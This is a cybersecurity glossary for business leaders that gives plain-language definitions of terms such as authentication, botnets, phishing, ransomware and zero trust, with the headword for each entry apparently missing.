The Essential Cybersecurity Glossary: Key Terms for Business Leaders and Tech Professionals

The system of ensuring only authorised users can access specific resources, like how a key card system controls who can enter different building areas.

A widely-used encryption method that scrambles data using complex mathematical operations to keep it secure.

A sophisticated, prolonged cyberattack where an unauthorised user gains and maintains undetected access to a network, often targeting specific organisations for extended periods of data extraction or system compromise.

The process of identifying unusual patterns or behaviours in systems and data that might indicate a security threat.

Software that scans your computer for malicious programs and suspicious behaviour, then quarantines or removes threats while providing real-time protection.

The practice of adding security features and testing software applications from development to deployment to protect them from cyberattacks and unauthorised access.

The total collection of points where an unauthorised user could potentially enter IT systems, including hardware, software, and network vulnerabilities.

The process of verifying the identity of a user, system, or application via passwords, biometrics or multi-factor authentication methods before allowing access to data, systems, resources, etc.

A copy of digital data stored separately from the original source, enabling recovery in case of data loss, system failure, or cyberattack.

A group of cyber security professionals who protect an organisation’s systems by monitoring networks, implementing controls, and actively defending against attacks.

A network of compromised computers or devices infected with malware, controlled remotely by cybercriminals to perform coordinated malicious activities like distributed denial-of-service (DDoS) attacks.

A policy that allows employees to use personal devices such as mobiles, laptops and tablets for work purposes.

When attackers use automation tools to try every possible password combination, log in details and other encrypted data to gain unauthorised access to an account.

A sophisticated email scam where attackers impersonate legitimate business contacts to trick employees into transferring funds or sharing sensitive information, often resulting in significant financial losses.

Protective measures and policies designed to safeguard cloud computing environments, including data, applications, and infrastructure.

The systems and infrastructure hackers use to communicate with and control compromised computers.

An attack where malicious code is injected into an otherwise trusted website or application to steal user data.

The practice of securing communication and information through codes and encryption techniques, protecting data from unauthorised access or manipulation.

Any malicious act intended to disrupt, damage, steal, or gain unauthorised access to computer systems, networks, and devices.

An incident where sensitive, protected, or confidential information is accessed, stolen, or released by unauthorised individuals, potentially compromising organisational or personal data.

Tools and processes that ensure sensitive data does not leave an organisation’s network without authorisation.

Artificially created videos, images, or audio that use artificial intelligence to make fake content appear real.

An attack from a single source to disrupt normal server, website, or network traffic by overwhelming the target with a flood of internet traffic to make it unavailable to users. See also DDoS, where multiple malicious sources are used.

The process of collecting and analysing digital evidence after a security incident to understand what happened and establish responsibility while maintaining legal standards.

An attack from multiple sources to disrupt the normal server, website, or network traffic by overwhelming the target or its surrounding infrastructure with a flood of internet traffic to make it unavailable to users.

The process of converting information or data into a code to prevent unauthorised access, making information unreadable without the correct decryption key.

Security software that monitors and responds to suspicious activities on end-user devices like laptops, desktops, servers and phones.

A piece of software or sequence of commands that takes advantage of a vulnerability in an application or system to gain unauthorised access.

An advanced security system that integrates various security capabilities to collect and analyse data from multiple sources to detect threats – offering organisations a comprehensive and efficient form of cybersecurity.

A security system that oversees network traffic, blocking potentially harmful activity to create a barrier between trusted internal systems and untrusted external ones.

A strategic approach to aligning IT with business objectives while effectively managing risks and meeting regulatory requirements.

The practice of manipulating computer systems, networks, or applications to gain unauthorised access, often with malicious intent to steal data or disrupt operations.

A process that converts data into a fixed-size string of characters (a hash value) to create unique digital fingerprints for verifying data integrity and storing passwords.

A framework of policies and technologies ensuring that only authorised individuals access specific resources and data within an organisation’s digital ecosystem.

A structured approach to addressing and managing the aftermath of a security breach or cyberattack to minimise damage and recovery time.

A security risk from within an organisation involving current or former employees or contractors who misuse their authorised access to compromise an organisation’s security—this act can be intentional or unintentional.

Malicious software that records every keystroke made on a computer to steal passwords and other sensitive information.

Malicious software designed to damage, disrupt, or gain unauthorised access to computer systems, including viruses, ransomware, spyware, and trojans.

When an attacker secretly intercepts and possibly alters communications between a single user or users and an application – intending to steal sensitive data or carry out other malicious activities.

A security mechanism requiring users to provide two or more verification methods to gain access to a system, significantly reducing the risk of unauthorised entry.

The practice of protecting computer networks and their data from unauthorised access, misuse, malfunction, modification, destruction, or improper disclosure.

The process of dividing a network into smaller sub-networks to improve security and performance.

The process of regularly updating software to fix security vulnerabilities.

An authorised simulated cyberattack performed to evaluate the security of an information system by identifying vulnerabilities that malicious actors could exploit.

A cybercrime technique where attackers disguise themselves as trustworthy entities via email to deceive individuals into disclosing sensitive information like passwords or credit card details.

A system for creating, managing, and distributing digital certificates and keys that allow users to be securely identified – built into all web browsers to protect public traffic. 

Malicious software that prevents user access to computers and data, usually by encryption – cybercriminals then demand a ransom for their restoration and may also steal or threaten to leak data.

A group of cybersecurity professionals that conducts authorised, simulated cyberattacks to test an organisation’s security defences and identify vulnerabilities.

Malicious software that allows attackers to gain unauthorised remote control of a computer to enable activities such as keylogging and file access.

A security practice of running suspicious programs in an isolated environment to observe and analyse them without risking harm to the system.

Security protocols that protect and secure communications, such as email or video conferencing, over a computer network using encryption.

Programs that teach employees about security risks and best practices to help them recognise and appropriately respond to potential threats – leading to better protection for organisations against cyber attacks.

A comprehensive security solution that collects and analyses network traffic and resources across an organisation’s IT infrastructure – if suspicious activity is found, an alert is sent to a SOC analyst to take the necessary security precautions.

A centralised location within a business where specialised security teams monitor, detect, investigate and respond to cyber threats and incidents – including malware attacks, phishing emails and email hacking.

A tactic used by threat actors to psychologically manipulate people into revealing sensitive information or taking actions such as granting system access by exploiting human trust.

A technique cybercriminals use to disguise a communication to look like it’s coming from a trusted source.

Malicious software that is covertly installed on a computing device, designed to gather information about a person or organisation without their knowledge.

A cyberattack that targets an organisation by targeting vulnerable elements in its supply network, e.g. a third-party contractor with poor IT security protocols.

A broad term for an individual, group, or organisation that carries out, or intends to carry out, cyberattacks or malicious activities to digital systems and devices – including cybercriminals and insider threat.

The practice of proactively searching through IT networks to detect and isolate advanced threats.

A temporary authentication code generated by an algorithm that changes after a short time, usually 30 seconds – used in multi-factor authentication.

Malicious software, or malware, disguised as legitimate software, used to gain access to the user’s system – typically disguised in free-to-download files and email attachments.

A service that creates a secure, encrypted connection between a user’s device and a remote network, protecting data transmission and ensuring privacy.

A type of malware that spreads between devices and networks through self-replication – commonly passed via emails, downloads, old software, fake websites, ads, etc.

A security tool that specifically protects web applications by filtering and monitoring HTTP traffic, blocking anything malicious.

A security model that requires continuous and strict identity verification for every person and device attempting to access an organisation’s network.